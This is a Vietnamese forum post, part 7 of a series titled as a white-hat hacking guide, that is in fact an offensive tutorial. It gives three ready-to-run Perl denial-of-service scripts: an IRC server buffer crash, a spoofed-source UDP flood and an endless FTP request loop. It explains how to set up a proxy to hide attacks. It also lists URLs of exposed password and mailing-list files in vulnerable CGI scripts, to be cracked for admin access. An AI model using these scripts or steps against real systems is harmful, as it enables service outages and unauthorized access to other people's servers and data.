Home...Kamosu s2 all
Bạn hãy ủng hộ forum bằng cách đăng kí làm thành viên nhé! Việc đăng kí rất đơn giản và không cần phải kích hoạt!
Sau khi đăng kí, bạn hãy đăng nhập và tham gia post bài ngay! Mỗi bài viết của bạn là một đóng góp quý báu cho LA9x Forum!
Chúc bạn một ngày vui vẻ! 
Trang ChínhLa9xCalendarTrợ giúpTìm kiếmĐăng kýĐăng Nhập

Share | 
  LÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down 
Bài gửiTiêu đề: LÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7LÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7 EmptyFri Jul 23, 2010 6:44 am
LÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7 PbucketLÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7 PbucketLÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7 Pbucket
LÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7 PbucketKamosuLÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7 Pbucket
LÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7 PbucketLÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7 PbucketLÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7 Pbucket
Kamosu
Admin

Admin

http://la9x.tk
Thông tin thành viên :
Click !Bài gửi : 151
Được thank : 0
Đến từ : Hai? Pho`ng

Chủ đề : LÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7
--------------------------------------------------


PART 7Cảm ơn sự ủng hộ của các bạn và đây là phần 742 . ) Kỹ thuật ấn công DoS vào WircSrv Irc
Server v5.07 :
_ WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị
Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự
) cho phép đến Port 6667.

Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên
Port 6667:Nếu bạn dùng Unix:[hellme@die-communitech.net$ telnet irc.example.com 6667

Trying example.com...

Connected to example.com.

Escape character is '^]'.

[buffer]Windows cũng tương tự:telnet irc.example.com 6667Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự .

Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau (
Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó ,
đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker
khi họ nghiên cứu . Nào , chúng ta hãy phân tích nó một cách căn bản ):CODE

#!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các
lệnh trong perl

use Getopt::Std;

use Socket;

getopts('s:', \%args);

if(!defined($args{s})){&usage;}

my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

$foo = "A"; # Đây là NOP

$number = "65000"; # Đây là tất cả số NOP

$data .= $foo x $number; # kết quả của $foo times $number

$serv = $args{s}; # lệnh điều khiển server từ xa

$port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là
6667

$buf = "$data";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");

$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");

$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");

connect(S, $paddr) ||die ("Error: $!");

select(S); $| = 1; select(STDOUT);

print S "$buf";

print S "$buf";

print("Data has been successfully sent to $serv\n");

sub usage {die("\n\n Lỗi WircSrv Version 5.07s

có thể tấn công bằng DoS \n gửi 2 64k gói tin đến server làm cho nó
crash.\n -s server_ip\n\n");}

Để sử dụng cái mã này , bạn hãy save nó vào một file *.pl , rồI
down chương trình activeperl về sài , setup nó rồi vào HĐH DOS bạn chỉ
cần gọi file này ra theo lệnh sau :C:\>perl < đường dẫn đến file *.pl >( Đến bây giờ tôi sẽ không bày thật cặn kẽ nữa mà sẽ tăng dần độ
khó lên , nếu bạn nào nghiên cứu kỹ các bài trước thì các bạn sẽ làm
được dễ dàng thôi )43 . ) Kỹ thuật tấn công DoS vào máy tính
sử dụng HĐH Win2000 :
_ Muốn sử dụng được nó , bạn phải có activeperl , rồi sử dụng như
hướng dẫn tương tự trên . Save đoạn mã vào file *.pl rồI dùng lệnh perl
gọi nó ra :CODE

#!/usr/bin/perl -w

use Socket;

use Net::RawIP;

use Getopt::Std;getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##;

print"--- $0 v.$ver b/ Nelson Brito / Independent Security
Consultant --- ";

$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;

$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;


$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $!
");($o{'s'}&&$o{'d'})||die

" Use: $0 [IP Options] [UDP Options] ",

"IP Options: ",

" -s* Đia chi nguon đe bat chuoc ",

" -d* Đia chi bi tan cong ",

" -v IP Version (def: $v) ",

" -t IP Type of Service (TOS) (def: $t) ",

" -f IP fragementation offset (def: $f) ",

" -T IP Time to Live (TTL) (def: $T) ",

"UDP Options: ",

" -p cong cua may tinh nan nhan (def: $p) ",

" -l chieu dai cua goi tin (def: $l) ",

" -r cai đat du lieu ngau nhien (def: ".") ",

"Generic: ",

" -n So luong goi tin ta muon gui đi (def: $n) ",

" -L gui goi tin lien tuc khong ngung cho đen khi may tinh cua nan
nhan bi die he he",

" Bai huong dan cua ANHDENDAY . ";while($n > 0){

$|=1;print".";$sp=int rand 65535;

$D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l;

$nb=new Net::RawIP({

ip=>

{

version=>$v,

tos=>$t,

ttl=>$T,

frag_off=>$f,

saddr=>$o{'s'},

daddr=>$o{'d'}

},

udp=>

{

source=>$sp,

dest=>$p,

len=>$l,

data=>$D

}

});

$nb->send;undef $nb;!$o{'L'}&&$n--;

}

print"Finish! ";

_ Khi gọi ra bạn hãy chọn tuỳ chọn đã ghi ở trong đó mà DoS . Nhớ
là chỉ dùng cho Win2000 nhé .44 . ) Kỹ thuật tấn công DoS dễ dàng nhất :_ Tôi thì mỗi lần muốn tấn công bằng DoS đều dùng chương trình này ,
nó chẳng kén gì cả và dễ thực hiện . Bây giờ tôi sẽ chia sẻ với các bạn
.

_ Bạn cần phải có Activeperl ( lại là activepert ) đã cài sẵn ,
save đoạn mã sau vào file abc.pl :CODE

#!/usr/bin/perluse IO::Socket;sub initiate {

if ($ARGV[0] eq '') {die "Usage: perl abc.pl <host>
<port> <username> <password>\nVi du : perl abc.pl
127.0.0.1 21 anonymous me@\n";}$host = $ARGV[0];

$port = $ARGV[1];

$user = $ARGV[2];

$pass = $ARGV[3];

};sub connecttoserver {

print("Connect den host: $host\n");

$socket = IO::Socket::INET->new (PeerAddr => $host,

PeerPort => $port,

Proto => "tcp",

Type => SOCK_STREAM

) || die "khong the connect den $host";print "Connect thanh cong . Loggin vao...\n";

};sub login {

print "user $user\n";

print $socket "user $user\r\n";

$response = <$socket>;

print "$response\n";print "pass $pass\n";

print $socket "pass $pass\r\n";

$response = <$socket>;

print "$response\n";print "Logged in. Dang tan cong DoS doi phuong. Nhan CTRL-C de
ngung.\n";

};sub doit {

for (;; ){

print "retr a:/x\n";

print $socket "retr a:/x\r\n";

$response = <$socket>;

print "$response";

}

}initiate();

connecttoserver();

login();

doit();

_Nếu bạn từng qua lập trình khi đọc đoạn mã bạn sẽ thấy rằng đoạn
mã này dùng chính thông tin từ ổ đĩa A của nạn nhân để tấn công nạn nhân
. Nó sử dụng vòng lặp không có giới hạn từ hàm $socket "retr a:/x\r\n" .
Khi muốn kết thúc bạn chỉ cần nhấn ctrl+C .

_Cuối cùng là bạn chỉ cần gọi nó ra thông qua lệnh perl như các bài
trên .VD :perl abc.pl http://www.xxx.com/ anonymous
metrong đó User name và Password có thể là bất kỳ .Vậy là coi như các bạn đã biết tấn công DoS là như thế nào rồi phải
không ? Đó chỉ là những cách tấn công DoS thông thường ( nhưng hậu quả
thì chẳng thường thường chút nào ) , còn các kỹ thuật DoS lợi hại khác
như DRDoS thì cho các bạn nghiên cứu thêm vậy . Nó rất nguy hiểm khi sử
dụng lung tung nên để dành phần đó cho các bạn nào thích và thật sự muốn
nghiên cứu về nó . Tôi xin dừng phần DoS tại đây .45 . ) Tự tạo cho mình một proxy để sài :_Trong các công việc như tấn công DoS hay đột nhập vào trang Web có
trang bị firewall thì bạn cần đến proxy để sài . Do đó các bạn hãy tự
tạo cho mình một cái proxy made in <yourname> sài cho nó oai . Bây
giờ hãy làm cùng tôi .

_ Trước hết bạn đăng ký một host miễn phí ở trang
free.prohosting.com . Bạn hãy khai báo thông tin về bạn trong các ô nhập
thông tin . Cuối cùng khi đăng ký xong bạn sẽ nhận được Mail từ trang
Web này gửi đến , hãy test nó để lấy pass mặc định mà nó cho bạn .

_ Tiếp theo bạn vào trang www.xav.com , rồi nhấp vào link install
phía dưới dòng chữ Test - script Package( tui nhớ là có 2 cái tên mang
chữ script này ) . Sau đó bạn nhấn "next" và nhìn ở phía dưới của trang
này có chữ show all verdon , bạn hãy nhấn vào đó .

_ Tiếp tục bạn nhấn James Marshall ==>CGIscript
==>CGIproxy==>Next==>accept==> cho đến khi bạn thấy một cái
bảng có nhiều ô nhập thông tin . Bạn hãy nhập thông tin vào các trang đó
:

+ your Website : nhập địa chỉ trang Web của bạn đã đăng ký trong
prohosting.com .

+ FTP username : Bạn nhập username mà bạn đã đăng ký trong
prohosting.com .

+ FTP password : Bạn nhập passwd mà prohosting.com đã send về mail
cho bạn .

+ Mấy cái còn lại không cần thiết , bạn nhấp next để tiếp tục . Rồi
nhấn finish .

+ Cuối cùng nó sẽ cho bạn địa chỉ bạn vừa tạo cái proxy đó , bạn
hãy ghi nhớ nó . Sau này mỗi lần “hành động” thì bạn lại đem ra sài .46 . ) Kỹ thuật lấy pass thông qua lỗi của
một số Script :
a . ) Calendar CGI Script :_ Một trong số những scripts đã tìm thấy điểm yếu đó là calendar
scripts , nó nằm trong thư mục cgi-bin/calendar, file config là file
calendar.cfg chứa administrator username và password để thay đổi chọn
lựa cho scripts khi cần , cái này có thể tìm thấy ở cuối file
calendar.cfg , tuy nhiên chúng đã được mã hoá chúng ta chỉ việc dùng
John The Ripper hay những công cụ khác để giải mã nó là xong :

_file calendar.cfg thường đặt tại địa chỉ sau :http://www.xxx.com/cgi-bin/calendar/calendar.cfg
sau khi crack xong chúng ta sẽ đến Admin Control Login vào địa chỉ :
http://www.xxx.com/cgi-bin/calen..._admin.pl?admin_ Vậy là bạn đã có được quyền admin rồi đó .b . ) WebBBS Script :_WebAdverts Script là một scripts cho phép webmasters hiển thị
những biểu ngữ luân phiên ( quảng cáo chẳng hạn ) hay thêm vào trong
trang Web , cuối cùng bạn có thể sử dụng kết hợp password và username để
cài đặt banners tạo một banner accounts mới , xoá accounts view
sensitive info, vv.vv

_Địa chỉ passwd của WebAdverts là :http://www.xxx.com/cgi-bin/advert/adpassword.txt
sau khi giải mã bạn logging vào:http://www.xxx.com/cgi-bin/advert/ads_admin.pl
để login như là script administrator .c . ) WWWBoard Script :_WWWBoard có file password có thể tìm thấy trong pasword.txt ,
chúng ta hãy search nó bằng từ khoá cgi-bin/wwwebboard hoặc
webboard/password.txt .d . ) Mailmachine Script :_Mailmachine.cgi là một webbased mailinglist , bạn có thể trông
thấy file adressed.txt chứa tất cả danh sách khách đã đăng ký , những
danh sách có thể thấy tại những urls sau:http://www.xxx.com/cgi-bin/mailman/addresses.txthttp://www.xxx.com/cgi-bin/maillist/addresses.txt

http://www.xxx.com/cgi-bin/mail/addresses.txt
bạn cũng nên tìm addresses.txt mà đôi khi chúng được đổi thành các
tên khác . Chúng có thể chứa các thông tin quan trọng cho phép bạn khai
thác .Việc tìm ra các trang bị lỗi này hẳn các bạn đã biết , tôi sẽ không
nhắc lại nữa ( Nếu ai chưa biết thì vui lòng đọc lạI những phần trước )
.======================================================Nhân đây tôi xin đính chính lại là trong các đoạn code mà tôi phân
tích và post lên ở những phần trước tôi đã sơ ý không thêm ký hiệu “#”
vào trước những câu phân tích đó , dẫn đến việc một số bạn thắc mắc là
đoạn code không hoạt động . Tôi thành thật xin lỗi các bạn vì sơ ý của
tôi , các bạn chỉ cần lấy đoạn code đó ra và thêm vào dấu “ # ” ở phía
trước dòng chú thích Tiếng Việt của tôi là được ( Thông thường tôi có sử
dụng dấu “ < == ” để giải thích ở phiá đuôi đoạn code đó . Các bạn
hãy để ý mà fix nhé .

Chúc vui vẻ .GOOKLUCK!!!!!!!!!!!!Hết phần 7 .


LÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7 Album

Về Đầu Trang Go down
 

LÀM THẾ NÀO ĐỂ TRỞ THÀNH MỘT WHITE-HAT HACKER - Phần 7

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang 
Trang 1 trong tổng số 1 trang
Trả lời nhanh - Quick reply
Permissions in this forum:Bạn không có quyền trả lời bài viết
Home...Kamosu s2 all  :: Hacking-Sercurity-Programming-Designing :: Hack cơ bản-
Host By Forumotion   Powered by Kamosu
Tên miền , Hosting    Copyright 2010 - 2011, Jelsoft Enterprises Ltd
Free forum | Âm nhạc | Rap & Hip-Hop | © phpBB | Free forum support | Báo cáo lạm dụng | Thảo luận mới nhất